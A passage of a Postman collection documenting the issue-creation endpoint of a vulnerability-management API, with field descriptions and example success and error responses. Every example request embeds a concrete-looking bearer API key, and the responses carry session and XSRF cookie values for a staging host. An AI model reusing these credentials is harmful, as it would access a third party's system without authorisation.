Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"ab9f3f12-0179-4eec-81c2-07184bec7504","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"4480e1a0-d9fd-4d9a-a183-cb26e42334f3","name":"Malformed Request Body","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"severity\": 4\n}"},"url":{"raw":"https://homolog.gat.digital/api/v1/issues?size=30&page=0","protocol":"https","host":["homolog","gat","digital"],"path":["api","v1","issues"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"plain","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Date","value":"Mon, 17 Jun 2019 21:10:35 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0u5agvmpv00761rdc1emt15cjc5040.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01bjrtjdh0eqrynoqlfo7io3mq5075.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=06fd67e9-bb98-40c0-8fa0-18ed49b9e3f9;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01bjrtjdh0eqrynoqlfo7io3mq5075.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"06fd67e9-bb98-40c0-8fa0-18ed49b9e3f9","key":"XSRF-TOKEN"}],"responseTime":null,"body":""}],"_postman_id":"24c9aca3-be72-4ce3-a632-5b455ab5bb39"},{"name":"Create a new Issue","id":"dbd628bc-41b0-41d0-aed3-595c2e0be130","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"body":{"mode":"formdata","formdata":[{"key":"kb_id","value":"String","description":"<p>[optional] The ID of the KB Vulnerability. If this is set, all information from the KB will be used to create the Issue. You can override the information. Eg: if you specify the \"severity\", it will override the default severity contained in the KB.</p>\n","type":"text"},{"key":"title","value":"String","description":"<p>[required if \"kb_id\" not set] The title of the Issue.</p>\n","type":"text"},{"key":"severity","value":"Int","description":"<p>[required if \"kb_id\" not set] Integer from 0 to 4. If not set, it defaults to 0.</p>\n","type":"text"},{"key":"asset","value":"Object","description":"<p>[required] You can specify an existing Asset ID, or create a whole new Asset.</p>\n","type":"text"},{"key":"asset.asset_id","value":"String","description":"<p>[optional] If this is set, all the other Asset parameters are not necessary.</p>\n","type":"text"},{"key":"asset.asset_type","value":"String","description":"<p>[required if new Asset] \"HOST\", \"APPLICATION\", \"PERSON\", \"PROCESS\" or \"CLOUD\".</p>\n","type":"text"},{"key":"asset.severity","value":"Int","description":"<p>[optiona if new Asset] Integer from 0 to 4. If not set, it defaults to 0.</p>\n","type":"text"},{"key":"asset.tag","value":"List<String>","description":"<p>[optional if new Asset] List of Tags.</p>\n","type":"text"},{"key":"asset.host_ip","value":"String","description":"<p>[required if new Asset and type==HOST] The Host IP Address.</p>\n","type":"text"},{"key":"asset.hostname","value":"String","description":"<p>[optional if new Asset and type==HOST] The Host Hostname.</p>\n","type":"text"},{"key":"asset.host_os","value":"String","description":"<p>[optional if new Asset and type==HOST] The Host Operating System.</p>\n","type":"text"},{"key":"asset.host_netbios","value":"String","description":"<p>[optional if new Asset and type==HOST] The Host Netbios.</p>\n","type":"text"},{"key":"asset.app_url","value":"String","description":"<p>[required if new Asset and type==APPLICATION] The WebApp URL.</p>\n","type":"text"},{"key":"asset.app_credentials","value":"String","description":"<p>[optional if new Asset and type==APPLICATION] The Web App Credentials.</p>\n","type":"text"},{"key":"asset.app_description","value":"String","description":"<p>[optional if new Asset and type==APPLICATION] The Web App Description.</p>\n","type":"text"},{"key":"asset.app_port","value":"Int","description":"<p>[optional if new Asset and type==APPLICATION] The WebApp Port number.</p>\n","type":"text"},{"key":"asset.person_email","value":"String","description":"<p>[required if new Asset and type==PERSON] The Person Email Address.</p>\n","type":"text"},{"key":"asset.person_name","value":"String","description":"<p>[optional if new Asset and type==PERSON] The Person First Name.</p>\n","type":"text"},{"key":"asset.person_surname","value":"String","description":"<p>[optional if new Asset and type==PERSON] The Person Surname.</p>\n","type":"text"},{"key":"asset.person_city","value":"String","description":"<p>[optional if new Asset and type==PERSON] The Person City.</p>\n","type":"text"},{"key":"asset.person_country","value":"String","description":"<p>[optional if new Asset and type==PERSON] The Person Country.</p>\n","type":"text"},{"key":"asset.person_phone","value":"String","description":"<p>[optional if new Asset and type==PERSON] The Person Phone Number.</p>\n","type":"text"},{"key":"asset.person_doc","value":"String","description":"<p>[optional if new Asset and type==PERSON] The Person Document Number.</p>\n","type":"text"},{"key":"asset.process_name","value":"String","description":"<p>[required if new Asset and type==PROCESS] The Process Name.</p>\n","type":"text"},{"key":"asset.process_description","value":"String","description":"<p>[optional if new Asset and type==PROCESS] The Process Description.</p>\n","type":"text"},{"key":"asset.cloud_instance_id","value":"String","description":"<p>[required if new Asset and type==CLOUD] The Cloud Instance ID.</p>\n","type":"text"},{"key":"asset.cloud_name","value":"String","description":"<p>[required if new Asset and type==CLOUD] The Cloud Name.</p>\n","type":"text"},{"key":"asset.cloud_description","value":"String","description":"<p>[optional if new Asset and type==CLOUD] The Cloud Description.</p>\n","type":"text"},{"key":"categories","value":"List<String>","description":"<p>[optional] List of Category IDs.</p>\n","type":"text"},{"key":"creation_date","value":"String","description":"<p>[optional] A date in the format \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"cvss_v3_score","value":"Float","description":"<p>[optional] The CVSS v3 Score.</p>\n","type":"text"},{"key":"due_date","value":"String","description":"<p>[optional] A date in the format \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"last_seen_date","value":"String","description":"<p>[optional] A date in the format \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"mitigation","value":"List<String>","description":"<p>[optional] List of Mitigation IDs.</p>\n","type":"text"},{"key":"protocol","value":"String","description":"<p>[optional if Asset is HOST] The protocol this Issue affects. If not set, it will be \"tcp\".</p>\n","type":"text"},{"key":"port","value":"Int","description":"<p>[required if Asset is HOST] The Port number this Issue affects.</p>\n","type":"text"},{"key":"recommendation","value":"List<String>","description":"<p>[optional] List of Recommendation IDs</p>\n","type":"text"},{"key":"responsible","value":"String","description":"<p>[optional] User ID that is responsible for the Issue.</p>\n","type":"text"},{"key":"root_cause","value":"String","description":"<p>[optional] Root Cause ID.</p>\n","type":"text"},{"key":"status","value":"String","description":"<p>[optional] \"PENDING\", \"REOPENED\", \"RETEST\", \"TREATMENT\", \"FIXED\", \"ACCEPT\" or \"NONEXISTENT\". If not set, it will be \"PENDING\".</p>\n","type":"text"},{"key":"tag","value":"List<String>","description":"<p>[optional] List of Tags.</p>\n","type":"text"},{"key":"test","value":"List<String>","description":"<p>[optional] List of Test IDs.</p>\n","type":"text"},{"key":"watcher","value":"List<String>","description":"<p>[optional] List of User IDs that will become Watchers on this Issue.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/issues","description":"<p>This endpoint allows you to create a new Issue.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"49b34b22-c976-4146-9598-83d2c7c4ab72","id":"49b34b22-c976-4146-9598-83d2c7c4ab72","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","issues"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"c6ee58bf-07e4-486e-ac2a-770716b53afc","name":"New Issue on an existing HOST Asset","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"asset\": {\n\t\t\"asset_id\": \"5ab9178ee12f5e05704b903c\"\n\t},\n\t\"title\": \"OS Identification\",\n\t\"description\": \"\\nUsing a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of the remote operating system in use. It is also possible sometimes to guess the version of the operating system.\",\n\t\"severity\": 1,\n\t\"port\": 0\n}"},"url":"https://subdomain.gat.digital/api/v1/issues"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Mon, 17 Jun 2019 21:58:23 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node09zpy400orsjt1lasp0c91h45i5665.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0wzydh2upi2p21x6myqpwejrny6114.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=a9d5e692-da2f-44fd-ab72-fa3f0c51ca83;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0wzydh2upi2p21x6myqpwejrny6114.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"a9d5e692-da2f-44fd-ab72-fa3f0c51ca83","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"OS Identification\",\n    \"description\": \"\\nUsing a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of the remote operating system in use. It is also possible sometimes to guess the version of the operating system.\",\n    \"severity\": 1,\n    \"asset\": \"5ab9178ee12f5e05704b903c\",\n    \"port\": 0,\n    \"protocol\": \"tcp\",\n    \"status\": \"PENDING\",\n    \"issue_id\": \"5d080cffc569d5025016ebcb\",\n    \"id_gat_detail\": 2685,\n    \"cvss_v3_score\": 2.2211673,\n    \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n    \"creation_date\": \"2019-06-17T18:58:23\",\n    \"last_seen_date\": \"2019-06-17T18:58:23\"\n}"},{"id":"d920561a-331c-4093-812c-759ecb92d9f0","name":"Wrong Asset ID","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"asset\": {\n\t\t\"asset_id\": \"5d091b89c569d50000000000\"\n\t},\n\t\"title\": \"Definir a Gestão dos Ativos de Informação\",\n\t\"severity\": 0\n}"},"url":"https://subdomain.gat.digital/api/v1/issues"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:05:59 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0175rtjkvm8mhf1xisg7vdjqxnk9402.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node013os3nxikfycs160oiosezgfjk9406.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=fc0e14df-efd3-45e0-817f-acd6fef5eec0;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node013os3nxikfycs160oiosezgfjk9406.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"fc0e14df-efd3-45e0-817f-acd6fef5eec0","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"Malformed request bod\",\"error_key\":\"error.null.params\"}"},{"id":"80506ded-902d-44e4-b41a-dd42df7d2895","name":"Missing Asset","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"title\": \"Definir a Gestão dos Ativos de Informação\",\n\t\"severity\": 0\n}"},"url":"https://subdomain.gat.digital/api/v1/issues"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:04:31 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0f546p56rfbghhggpp5mhnz4w9367.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=a31fd9c0-db50-4cee-a2a9-00ffb9ea06da;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0f546p56rfbghhggpp5mhnz4w9367.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"a31fd9c0-db50-4cee-a2a9-00ffb9ea06da","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"Malformed request bod\",\"error_key\":\"error.null.params\"}"},{"id":"6490d13a-84ef-4978-a9a4-2990e51616d7","name":"New Issue on an existing PERSON Asset","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"asset\": {\n\t\t\"asset_id\": \"5ca65362c569d55f01cd5b71\"\n\t},\n\t\"kb_id\": \"5d01a446c569d5025016d685\",\n\t\"title\": \"2,844 Separate Data Breaches\",\n\t\"severity\": 3\n}"},"url":"https://subdomain.gat.digital/api/v1/issues"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Wed, 19 Jun 2019 09:46:15 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node04y4nk8wh1ptr1x2zgyq1vdwf98400.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01rlnleeczcqhk1hb3uukvpon2t8401.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=e88979e7-6ebe-4e79-8b8d-b494bd4c49d5;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01rlnleeczcqhk1hb3uukvpon2t8401.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"e88979e7-6ebe-4e79-8b8d-b494bd4c49d5","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"2,844 Separate Data Breaches\",\n    \"description\": \"In February 2018, <a href=\\\"https://www.troyhunt.com/ive-just-added-2844-new-data-breaches-with-80m-records-to-have-i-been-pwned/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">a massive collection of almost 3,000 alleged data breaches was found online</a>. Whilst some of the data had previously been seen in Have I Been Pwned, 2,844 of the files consisting of more than 80 million unique email addresses had not previously been seen. Each file contained both an email address and plain text password and were consequently loaded as a single &quot;unverified&quot; data breach.\",\n    \"severity\": 3,\n    \"asset\": \"5ca65362c569d55f01cd5b71\",\n    \"protocol\": \"tcp\",\n    \"status\": \"PENDING\",\n    \"issue_id\": \"5d0a0467c569d5025016ec17\",\n    \"id_gat_detail\": 2685,\n    \"cvss_v3_score\": 7.260418935,\n    \"root_cause\": \"5ce7cec1c569d52c0f2d5729\",\n    \"creation_date\": \"2019-06-19T06:46:15\",\n    \"last_seen_date\": \"2019-06-19T06:46:15\"\n}"},{"id":"c86365ca-0c75-4264-a249-f4ff68fb928d","name":"New Issue on a new APPLICATION Asset","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"asset\": {\n\t\t\"type\": \"APPLICATION\",\n\t\t\"app_url\": \"http://mycompany2.com\",\n\t\t\"severity\": 2\n\t},\n\t\"vulnerable_parameter\": {\n\t\t\"url\": \"/login\",\n\t\t\"http_method\": \"POST\",\n\t\t\"parameter\": \"username\"\n\t},\n\t\"title\": \"Cross-Site Scripting Stored\",\n\t\"severity\": 4\n}"},"url":"https://subdomain.gat.digital/api/v1/issues"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Mon, 17 Jun 2019 22:28:01 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0h8hqs4wgerrbkl11cl4vyi26481.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0ds58yap15guyi1beklgt1xnr6485.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=8c823648-3271-4979-aedc-bfcccf27f65c;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0ds58yap15guyi1beklgt1xnr6485.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"8c823648-3271-4979-aedc-bfcccf27f65c","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"Cross-Site Scripting Stored\",\n    \"severity\": 4,\n    \"asset\": \"5d0813f1c569d501433592b3\",\n    \"protocol\": \"tcp\",\n    \"status\": \"PENDING\",\n    \"cves\": [\n        \"5cad0edfc569d524a08f6d35\"\n    ],\n    \"cwes\": [\n        \"5cad0edfc569d524a08f6d35\"\n    ],\n    \"issue_id\": \"5d0813f1c569d5025016ebe0\",\n    \"id_gat_detail\": 2685,\n    \"cvss_v3_score\": 9.760161495000002,\n    \"root_cause\": \"5cad0edec569d524a08f6d0f\",\n    \"creation_date\": \"2019-06-17T19:28:01\",\n    \"last_seen_date\": \"2019-06-17T19:28:01\",\n    \"vulnerable_parameter\": {\n        \"url\": \"/login\",\n        \"parameter\": \"username\",\n        \"http_method\": \"POST\"\n    }\n}"},{"id":"0386dc3d-4964-434a-8d18-387f5fa21ae3","name":"New Issue on a new PROCESS Asset","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"asset\": {\n\t\t\"type\": \"PROCESS\",\n\t\t\"process_name\": \"Empresa A\"\n\t},\n\t\"title\": \"Responder e se recuperar de um Incidente de Segurança e Privacidade\",\n\t\"severity\": 0,\n\t\"responsible\": \"5ab548ebe12f5e056e329776\",\n\t\"expiration_date\": \"2019-07-01T23:59:59\"\n}"},"url":"https://subdomain.gat.digital/api/v1/issues"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Wed, 19 Jun 2019 09:49:13 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01rlnleeczcqhk1hb3uukvpon2t8401.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node07vjx6k549ff0rjogzccyt85s8475.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=405bce87-dd33-4f48-8f12-3009ebf31c78;Path=/","name":"Set-Cookie","description":"an HTTP 